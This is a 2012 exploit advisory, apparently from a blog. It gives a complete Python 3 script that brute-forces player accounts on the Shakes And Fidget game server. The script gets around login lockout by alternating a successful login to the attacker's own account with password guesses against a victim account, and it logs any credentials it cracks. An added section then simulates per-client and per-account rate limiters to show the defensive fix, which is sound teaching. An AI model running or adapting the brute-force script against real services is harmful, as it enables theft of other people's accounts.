Shakes And Fidget - Brute Force Protection Bypass
Source: http://snakingmax.blogspot.com  Author: SnakingMax  Published: 2012-07-10
 # Exploit Title: [Shakes And Fidget - Brute Force Protection Bypass]
 # Date: [04/07/2012]
 # Author: [SnakingMax]
 # Website: http://snakingmax.blogspot.com/
 # Software Link: [http://www.sfgame.es/]
 # Vendor: Playa Games GmbH
# Category: [Remote Exploit]


# Vulnerability description:
# Bypass brute force protection by alternating a positive attempt (legitimate account)
# with a test attempt (victim's account).
#
# 26/12/2011 - Vendor informed
# 04/07/2012 - Vulnerability not fixed


######################### EXPLOIT CODE (python 3) ############################

import sys, time, hashlib
from random import randrange
from http.client import HTTPConnection
import urllib.request

	
def str2md5( string ):
	return hashlib.md5(string.encode('utf-8')).hexdigest()


def tryUserPass(username, password):
	print("Trying User: "+username+" and Pass:"+password)
	conn = HTTPConnection('s4.sfgame.es')
	# positive attempt (legitimate account)
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002sfbf%3Bacc1c81abcdab1f53cfdfe7030c076bc%3Bv1.60&random=%2&rnd=0")
	response = conn.getresponse()
	response.close()
	conn.close()
	conn = HTTPConnection('s4.sfgame.es')
	# test attempt (victim's account)
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002{0}%3B{1}%3Bv1.60&random=%2&rnd={2}".format(username.strip(),str2md5(str(password.strip())), randrange(999999)))
	response = conn.getresponse()
	data = response.read()[:10]
	response.close()
	conn.close()
	if (len(str(data)) > 7):
		print("Password found. See log.txt file.")
		return True
	else:
		return False

def bruteforce(userlist, pwdlist):
	usersFileList = open ( userlist , 'rt')
	dumpUsers = usersFileList.read()
	usersFileList.close()
	userl = dumpUsers.split()
	pwdFileList = open (pwdlist, 'rt')
	dumpPwd = pwdFileList.read()
	pwdl = dumpPwd.split()
	pwdFileList.close()
	for i in range(len(userl)):
		for j in range(len(pwdl)):
			if (tryUserPass(userl[i], pwdl[j])):
				log = open ('log.txt', 'at')
				log.write("\n------PASSWORD FOUND------\nUsername: " + userl[i] + "\nPassword: " + pwdl[j] + "\n--------------------------")
				log.close()

if ( (__name__)=="__main__" ):
	if len(sys.argv) != 3:
		print("usage:\n")
		print( sys.argv[0]+" [userlist.txt] [pwdlist.txt]\n\n")
		print("Downloaded from: http://snakingmax.blogspot.com/")
	else:
		userlist = sys.argv[1];
		pwdlist = sys.argv[2];
		print("Trying Username/Password combinations...")
		bruteforce(userlist, pwdlist)

######################### END OF EXPLOIT CODE (python 3) ############################
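
Defender's view of the flaw described above, as an added example that is not part of the original advisory or the vendor's code. It assumes the server kept one failure counter per client and cleared it on any successful login, and compares that with counters keyed to the target account; the class names, threshold, client address and account names are all constructed for illustration.

```python
from collections import defaultdict

MAX_FAILURES = 5  # assumed threshold, not taken from the game server

class PerClientLimiter:
    # Assumed weak design: one counter per client, cleared by ANY successful login.
    def __init__(self):
        self.failures = defaultdict(int)

    def allow(self, client, account):
        return self.failures[client] < MAX_FAILURES

    def record(self, client, account, success):
        if success:
            self.failures[client] = 0   # own-account login wipes the count
        else:
            self.failures[client] += 1

class PerAccountLimiter:
    # Hardened: failures counted per target account and per client; a success
    # clears only the counter of the account that actually logged in.
    def __init__(self):
        self.account_failures = defaultdict(int)
        self.client_failures = defaultdict(int)

    def allow(self, client, account):
        return (self.account_failures[account] < MAX_FAILURES
                and self.client_failures[client] < 4 * MAX_FAILURES)

    def record(self, client, account, success):
        if success:
            self.account_failures[account] = 0
        else:
            self.account_failures[account] += 1
            self.client_failures[client] += 1   # not reset by a success elsewhere

def guesses_checked(limiter, events, target):
    # Count wrong guesses against `target` that reached the password check.
    checked = 0
    for client, account, success in events:
        if not limiter.allow(client, account):
            continue                      # rejected before the password check
        limiter.record(client, account, success)
        checked += (account == target and not success)
    return checked

# Constructed traffic: 20 rounds of own-account success, then a wrong guess on "victim".
EVENTS = [e for _ in range(20)
          for e in (("198.51.100.7", "own", True), ("198.51.100.7", "victim", False))]

if __name__ == "__main__":
    print("per-client:", guesses_checked(PerClientLimiter(), EVENTS, "victim"))
    print("per-account:", guesses_checked(PerAccountLimiter(), EVENTS, "victim"))
```

In production the counters would expire over a time window, and a delay or CAPTCHA is usually preferable to a hard lockout so the per-account counter cannot be used to lock the legitimate owner out.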

 